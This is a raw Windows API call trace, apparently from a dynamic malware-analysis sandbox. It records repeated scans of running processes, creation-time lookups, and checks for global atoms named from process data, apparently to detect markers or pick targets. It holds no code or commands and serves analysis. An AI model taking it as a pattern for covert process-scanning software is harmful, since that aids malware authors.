	[0100.755] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.755] CloseHandle (hObject=0x3fc) returned 1
	[0100.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x3fc
	[0100.755] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.755] CloseHandle (hObject=0x3fc) returned 1
	[0100.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x3fc
	[0100.755] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.755] CloseHandle (hObject=0x3fc) returned 1
	[0100.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x3fc
	[0100.755] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.755] CloseHandle (hObject=0x3fc) returned 1
	[0100.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x3fc
	[0100.756] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.756] CloseHandle (hObject=0x3fc) returned 1
	[0100.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0100.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x3fc
	[0100.756] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.756] CloseHandle (hObject=0x3fc) returned 1
	[0100.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x3fc
	[0100.756] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.756] CloseHandle (hObject=0x3fc) returned 1
	[0100.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x3fc
	[0100.756] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.757] CloseHandle (hObject=0x3fc) returned 1
	[0100.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x3fc
	[0100.757] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.757] CloseHandle (hObject=0x3fc) returned 1
	[0100.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x3fc
	[0100.757] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.757] CloseHandle (hObject=0x3fc) returned 1
	[0100.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x3fc
	[0100.757] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.757] CloseHandle (hObject=0x3fc) returned 1
	[0100.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x3fc
	[0100.757] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.757] CloseHandle (hObject=0x3fc) returned 1
	[0100.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x3fc
	[0100.758] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.758] CloseHandle (hObject=0x3fc) returned 1
	[0100.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x3fc
	[0100.758] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.758] CloseHandle (hObject=0x3fc) returned 1
	[0100.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x3fc
	[0100.758] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.758] CloseHandle (hObject=0x3fc) returned 1
	[0100.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x3fc
	[0100.758] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.758] CloseHandle (hObject=0x3fc) returned 1
	[0100.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x3fc
	[0100.758] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.758] CloseHandle (hObject=0x3fc) returned 1
	[0100.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x3fc
	[0100.759] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.759] CloseHandle (hObject=0x3fc) returned 1
	[0100.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x3fc
	[0100.759] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.759] CloseHandle (hObject=0x3fc) returned 1
	[0100.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x3fc
	[0100.759] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.759] CloseHandle (hObject=0x3fc) returned 1
	[0100.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x3fc
	[0100.759] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.759] CloseHandle (hObject=0x3fc) returned 1
	[0100.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x3fc
	[0100.759] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.760] CloseHandle (hObject=0x3fc) returned 1
	[0100.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x3fc
	[0100.760] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.760] CloseHandle (hObject=0x3fc) returned 1
	[0100.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x3fc
	[0100.760] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.760] CloseHandle (hObject=0x3fc) returned 1
	[0100.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x3fc
	[0100.760] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.760] CloseHandle (hObject=0x3fc) returned 1
	[0100.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x3fc
	[0100.760] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.760] CloseHandle (hObject=0x3fc) returned 1
	[0100.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x3fc
	[0100.761] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.761] CloseHandle (hObject=0x3fc) returned 1
	[0100.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3fc
	[0100.761] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.761] CloseHandle (hObject=0x3fc) returned 1
	[0100.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3fc
	[0100.762] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.762] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0100.762] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0100.762] wsprintfA (in: param_1=0x6939b8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0100.762] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.762] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0100.763] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.763] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0100.763] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0100.763] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0100.763] CloseHandle (hObject=0x3fc) returned 1
	[0100.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0100.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x3fc
	[0100.763] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.763] CloseHandle (hObject=0x3fc) returned 1
	[0100.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x3fc
	[0100.763] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.763] CloseHandle (hObject=0x3fc) returned 1
	[0100.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0100.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0100.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0100.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0100.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0100.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0100.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0100.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0100.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0100.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0100.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0100.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0100.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0100.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0100.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0100.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0100.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0100.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0100.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x470
	[0100.885] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.885] CloseHandle (hObject=0x470) returned 1
	[0100.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0100.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0100.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x470
	[0100.885] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.885] CloseHandle (hObject=0x470) returned 1
	[0100.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0100.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x470
	[0100.886] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.886] CloseHandle (hObject=0x470) returned 1
	[0100.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x470
	[0100.886] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.886] CloseHandle (hObject=0x470) returned 1
	[0100.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x470
	[0100.886] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.886] CloseHandle (hObject=0x470) returned 1
	[0100.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x470
	[0100.886] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.886] CloseHandle (hObject=0x470) returned 1
	[0100.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x470
	[0100.887] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.887] CloseHandle (hObject=0x470) returned 1
	[0100.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x470
	[0100.887] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.887] CloseHandle (hObject=0x470) returned 1
	[0100.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0100.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x470
	[0100.887] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.887] CloseHandle (hObject=0x470) returned 1
	[0100.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x470
	[0100.887] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.887] CloseHandle (hObject=0x470) returned 1
	[0100.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x470
	[0100.888] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.888] CloseHandle (hObject=0x470) returned 1
	[0100.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x470
	[0100.888] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.888] CloseHandle (hObject=0x470) returned 1
	[0100.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x470
	[0100.888] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.888] CloseHandle (hObject=0x470) returned 1
	[0100.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x470
	[0100.888] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.888] CloseHandle (hObject=0x470) returned 1
	[0100.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x470
	[0100.888] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.888] CloseHandle (hObject=0x470) returned 1
	[0100.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x470
	[0100.889] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.889] CloseHandle (hObject=0x470) returned 1
	[0100.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x470
	[0100.889] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.889] CloseHandle (hObject=0x470) returned 1
	[0100.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x470
	[0100.890] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.890] CloseHandle (hObject=0x470) returned 1
	[0100.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x470
	[0100.890] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.890] CloseHandle (hObject=0x470) returned 1
	[0100.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x470
	[0100.890] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.890] CloseHandle (hObject=0x470) returned 1
	[0100.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x470
	[0100.890] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.890] CloseHandle (hObject=0x470) returned 1
	[0100.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x470
	[0100.890] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.890] CloseHandle (hObject=0x470) returned 1
	[0100.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x470
	[0100.891] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.891] CloseHandle (hObject=0x470) returned 1
	[0100.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x470
	[0100.891] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.891] CloseHandle (hObject=0x470) returned 1
	[0100.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x470
	[0100.891] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.891] CloseHandle (hObject=0x470) returned 1
	[0100.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x470
	[0100.891] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.891] CloseHandle (hObject=0x470) returned 1
	[0100.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x470
	[0100.891] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.891] CloseHandle (hObject=0x470) returned 1
	[0100.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x470
	[0100.892] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.892] CloseHandle (hObject=0x470) returned 1
	[0100.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x470
	[0100.892] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.892] CloseHandle (hObject=0x470) returned 1
	[0100.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x470
	[0100.892] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.892] CloseHandle (hObject=0x470) returned 1
	[0100.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x470
	[0100.892] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.892] CloseHandle (hObject=0x470) returned 1
	[0100.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x470
	[0100.893] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.893] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0100.893] GetProcessTimes (in: hProcess=0x470, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0100.893] wsprintfA (in: param_1=0x68f2d0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0100.893] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.894] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0100.894] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.894] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0100.894] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0100.894] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0100.894] CloseHandle (hObject=0x470) returned 1
	[0100.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0100.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x470
	[0100.894] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.894] CloseHandle (hObject=0x470) returned 1
	[0100.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x470
	[0100.895] IsWow64Process (in: hProcess=0x470, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.895] CloseHandle (hObject=0x470) returned 1
	[0100.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0100.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0100.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0100.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0100.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0100.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0100.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0100.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0100.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0100.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0100.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0100.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0100.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0100.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0100.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0100.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0100.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0100.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0100.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x478
	[0100.959] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.959] CloseHandle (hObject=0x478) returned 1
	[0100.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0100.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0100.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x478
	[0100.960] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.960] CloseHandle (hObject=0x478) returned 1
	[0100.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0100.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x478
	[0100.960] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.960] CloseHandle (hObject=0x478) returned 1
	[0100.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x478
	[0100.960] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.960] CloseHandle (hObject=0x478) returned 1
	[0100.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x478
	[0100.961] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.961] CloseHandle (hObject=0x478) returned 1
	[0100.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x478
	[0100.961] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.961] CloseHandle (hObject=0x478) returned 1
	[0100.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x478
	[0100.961] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.961] CloseHandle (hObject=0x478) returned 1
	[0100.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x478
	[0100.961] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.961] CloseHandle (hObject=0x478) returned 1
	[0100.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0100.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x478
	[0100.962] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.962] CloseHandle (hObject=0x478) returned 1
	[0100.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x478
	[0100.962] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.962] CloseHandle (hObject=0x478) returned 1
	[0100.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x478
	[0100.962] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.962] CloseHandle (hObject=0x478) returned 1
